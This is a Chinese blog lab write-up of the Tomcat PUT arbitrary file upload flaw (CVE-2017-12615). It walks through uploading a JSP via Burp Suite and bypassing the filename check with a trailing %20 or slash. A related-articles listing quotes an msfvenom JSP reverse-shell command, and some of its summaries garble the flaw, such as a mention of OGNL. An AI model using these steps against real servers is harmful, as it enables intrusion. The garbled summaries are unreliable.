Tomcat任意文件上传(CVE-2017-12615)

最新推荐文章于 2024-06-17 16:18:21 发布
最新推荐文章于 2024-06-17 16:18:21 发布
阅读量1.1k 收藏
点赞数
文章标签: tomcat servlet java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73720136/article/details/130537894
版权

实验原理

Tomcat配置文件web.xml中,servlet配置了readonly=fasle时,会引发任意文件上传漏洞。
readonly参数默认是true,即不允许delete和put操作,所以通过XMLHttpRequest对象的put或者delete方法访问就会报告http 403错误。但很多时候为了支持REST服务,会设置该属性为false。将readonly参数设置为false时,即可通过PUT方式创建一个JSP文件,并可以执行任意代码。
在Tomcat文件夹下的/conf/web.xml文件中,添加readonly参数,属性值为false,即在114行插入以下内容:


修改配置文件完成后需要重启Tomcat,重启的方式是双击Tomcat目录下的bin目录下的shutdown.bat,在点击startup.bat。
Tomcat任意文件上传(CVE-2017-12615)漏洞影响的Tomcat版本为:

tomcat7.0.0-7.0.81

实验步骤

1、登录操作机,打开浏览器,输入实验地址:http://ip:8080

2、打开桌面的的“Burp”文件夹,双击“BURP.cmd”启动Burp Suite抓包工具

3、切换到“Proxy”代理模块的“Options”,查看Bp的代理,选中该代理,点击左侧的"Edit",将其端口修改为8088(避免与Tomcat端口冲突)



 

4、切换到浏览器,选择火狐插件中的代理(配置浏览器的的代理),选中该代理,将其端口也修改为8088,与Bp的代理一致(注:代理名称可以修改也可以不修改)



 

5、刷新网页,Bp成功抓取数据包

6、鼠标右击,点击"Send to Repeater"(或者快捷键"Ctrl" + “R”),发送数据包到Repeater模块,然后切换到Repeater模块
 

7、修改数据包,尝试上传jsp脚本文件

8、点击上面的"Send",发送修改后的数据包,结果返回404,请求被拦截,不能直接上传jsp文件

9、由于文件名的限制,在数据包中添加"%20"(空格的URL编码),绕过限制,再次点击上面的"Send",返回201,上传成功
 

10、关闭浏览器代理

11、访问http://ip:8080/hack.jsp,新的脚本文件成功解析

实验总结

掌握文件上传中的Tomcat任意文件上传(CVE-2017-12615)漏洞影响的Tomcat版本以及配置文件,利用Burp Suite工具抓取数据包,将数据包内容修改,请求方式修改为PUT方式,上传新建的jsp脚本文件,文件内容可以任意编写,也可以是木马。上传时结果返回404,请求被拦截,不能直接上传jsp文件,是因为有限制:

1. NTFS文件流
2. 文件名相关限制

可以采取一些方法来绕过限制,比如Windows中文件名不能以空格结尾,在文件名后面加空格"%20",也可以加斜杠"/"。

韩无棣
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2017-12615-master.zip
09-04
在`CVE-2017-12615-master.zip`文件中,可能包含了用于演示漏洞利用的工具和脚本。这些工具通常会模拟一个恶意的HTTP请求,其中包含能够触发远程代码执行的OGNL表达式。攻击者可以使用这些工具测试他们的目标系统...
tomcat漏洞之任意文件上传CVE-2017-12615
weixin_53711701的博客
12-24 2928
tomcat漏洞之任意文件上传CVE-2017-12615
tomcat服务器的文件上传功能实现
天真吖的博客
12-03 1738
目录一、场景:展示向服务器添加商品,商品信息包括图片,以及其他信息1,获取数据2.添加数据3.传回数据到前台二、附:配置CATALINA_HOME三、效果展示 1,获取数据 2.添加数据 3.传回数据到前台 略 按‘i’进入insert模式,在最后加入 如:/usr/local/tomcat/apache-tomcat-9.0.68按ESC退出insert模式,按‘:wq’,保存退出使配置生效 新建一个在webapps下新建upload文件夹可以看到:pid为3的这条数据
Tomcat部署及优化
最新发布
2301_82109773的博客
06-17 1096
ServletJava Servlet 的简称,可以理解为是一个服务连接器,是用 Java 编写的服务器端程序,具有独立于平台和协议的特性, 简单的理解:servlet 就是一个中间件,包含了接口和方法,将客户端和数据库连接,从而实现动态网页的创建。JSP 全称 Java Server Pages,是一种动态网页开发技术。它使用 JSP 标签在HTML网页中插入 Java 代码。标签通常以 <% 开头,以 %> 结束。
tomcat10上传文件两种方式,两种亲测有效
qq_45325310的博客
03-16 2680
https://blog.csdn.net/python_hhhh/article/details/122688507
任意文件上传
来日可期的博客
08-29 2316
任意文件上传漏洞(Arbitrary File Upload Vulnerability)是指攻击者通过某种方式绕过服务器端对上传文件类型和路径的合法性检查,成功地上传恶意文件到目标服务器上,并执行其中的恶意代码。这种漏洞广泛存在于许多Web应用程序中,特别是那些允许用户上传文件的网站或Web应用。
TomcatPUT的文件上传漏洞(CVE-2017-12615)
weixin_52458793的博客
02-12 1154
详细教程
Tomcat 中是怎么处理文件上传的?
LeZiJie的博客
04-30 860
Tomcat 中是怎么处理文件上传的? 先点赞再看,养成好习惯 前言 这两天在另一个社区看到了一个关于 Tomcat 的提问,还挺有意思。正好自己之前也没思考过这个问题,今天就结合 Tomcat 机制来聊聊这个“为什么”。 本文对 HTTP 协议中的文件上传标准和 Tomcat 机制的分析内容较多,比较基础,不需要的大佬门可以直接跳到文末。 HTTP 协议中的文件上传 众所周知,HTTP 是一个文本协议,那文本协议如何传输文件呢? 直接传……是的就这么简单。文本协议只是在应...
hikvision_CVE-2017-7921配置文件解密.rar
05-20
具体影响产品型号,请参考CVE-2017-7921;CVE-2017-7922漏洞详情。 该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。 本程序需和配置文件存放在同一目录下运行exe即可配置文件名...
CVE-2017-7921海康威视配置文件解码(configfile解码)
12-11
具体影响产品型号,请参考CVE-2017-7921;CVE-2017-7922漏洞详情。该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。(ps:工具不会使用可以私信我,直接差评的一律自理)
tomcat任意文件上传
weixin_59872639的博客
02-24 945
环境讲解 Vulfocus Vulfocus 是一个漏洞集成平台,将漏洞环境 docker 镜像,放入即可使用,开箱即用。 部署Vulfocus 拉取vulfocus镜像 docker pull vulfocus/vulfocus:latest 运行vulfocus docker run -d -p 80:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IP=192.168.132.144 vulfocus/vulfocus
网络安全进阶学习第五课——文件上传漏洞
p36273的博客
07-03 4562
黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。getimagesize()函数会读取目标文件的16进制,验证目标文件16进制的头几个字符串是否符合图片的要求,通过此函数判断文件类型。通常在一个请求中,同样名称的参数只会出现一次,函数包含的文件都会被当作PHP代码执行,无论文件的名称是什么,只要符合文件内容符合PHP代码规范,都会被当作PHP代码执行。
《WEB安全漏洞30讲》(第5讲)任意文件上传漏洞
午夜安全
05-22 3327
文件上传漏洞,指攻击者利用程序缺陷绕过系统对文件的验证与处理策略将恶意程序上传到服务器并获得执行服务器端命令的能力。这个漏洞其实非常简单,就是攻击者给服务器上传了恶意的木马程序,然后利用此木马程序执行操作系统命令,从而获得服务器权限,造成严重的安全隐患。比如一个JAVA系统本来需要上传身份证图片进行用户实名认证,结果恶意用户上传了jsp木马文件,之后利用这个文件执行系统命令,再以这个系统为据点,对内网其他互通的系统进行攻击,这样将导致整个内网系统的沦陷。
tomcat源码学习-http文件上传
weixin_40893295的博客
03-10 339
为什么大表单提交场景下, tomcat的请求解析性能会比netty高出100+倍? 尺有所短, 寸有所长吧, 不同的框架擅长的领域是不同的. 本文结合笔者自身工作经验带大家一起学习tomcat对表单文件提交的处理策略如何战胜神一般的netty NIO.
Tomcat put任意文件上传
z.mumu的博客
09-10 1236
1.Tomcat8.5.19漏洞 PUT方法任意写文件漏洞(CVE-2017-12615) 打开burp尝试put方法任意文件上传 抓取页面,然后将Get方法改成PUT,注意文件名要/文件名/,然后内容直接空一行写在下面,返回201。 冰蝎连接 也可以使用msf生成jsp的木马进行连接 msfvenom -p java/jsp_shell_reverse_tcp LHOST=攻击机ip LPORT=端口 -f raw > shell.jsp 然后msf设置监听访问 最后就是使用现有的exp 我
文件任意上传
一个普普通通的博客
03-15 1176
文件上传任意上传
任意文件上传漏洞详解与防护
鑫和皓的博客
08-10 1831
任意文件上传漏洞是一种常见的网络安全问题,它允许攻击者上传并执行恶意文件,从而获取或破坏系统数据。上传恶意脚本:攻击者可以上传包含恶意代码的脚本文件,如PHP、ASP、JSP等,然后通过浏览器访问这些文件,执行恶意代码。上传恶意二进制文件:攻击者可以上传包含恶意代码的二进制文件,如DLL、EXE等,然后利用其他漏洞或手段执行这些文件。严格检查上传文件:对上传文件的类型、大小、名字和内容进行严格的检查,只接受符合要求的文件。使用安全编程技术:在编写文件上传功能时,使用安全编程技术,如预备语句、输入验证等。
cve-2017-12615脚本
09-04
CVE-2017-12615是一个由Apache Tomcat服务器引起的漏洞,它存在于Tomcat服务器的默认配置中。该漏洞使得攻击者能够通过进行远程命令执行来获取服务器的控制权。 该脚本的实现过程如下: 1. 首先,通过发送特制的HTTP请求,攻击者可以将恶意的Web应用程序(如war文件)上传到Tomcat服务器中。 2. 接下来,攻击者发送另一个特制的HTTP请求,触发Tomcat服务器对上传的Web应用程序进行部署。 3. 当Tomcat服务器部署恶意的Web应用程序时,该程序中的恶意代码将被执行。 4. 攻击者可以在恶意代码中包含任意的系统命令,从而实现远程命令执行。 5. 一旦成功执行命令,攻击者就能够在服务器上执行各种操作,例如文件读取/写入、系统信息获取等。 为了防御CVE-2017-12615漏洞,可以采取以下措施: 1. 及时更新和升级Apache Tomcat服务器,确保使用的版本没有漏洞。 2. 将Apache Tomcat和其他组件配置为具有最低特权,以减少潜在攻击者的影响范围。 3. 限制对Tomcat管理接口的访问,并使用强密码和多因素身份验证来保护管理接口。 4. 定期检查服务器上是否存在未知的应用程序文件或恶意代码,并将其删除。 5. 在Tomcat服务器上使用Web应用程序防火墙,以检测和阻止恶意HTTP请求。 6. 实施网络入侵检测系统(IDS)和入侵防御系统(IPS),以便及时检测和阻止攻击。 综上所述,CVE-2017-12615是一个严重的远程代码执行漏洞,攻击者通过利用该漏洞可以获取Tomcat服务器的控制权。为了避免受到此漏洞的攻击,我们必须采取一系列措施来确保Tomcat服务器的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值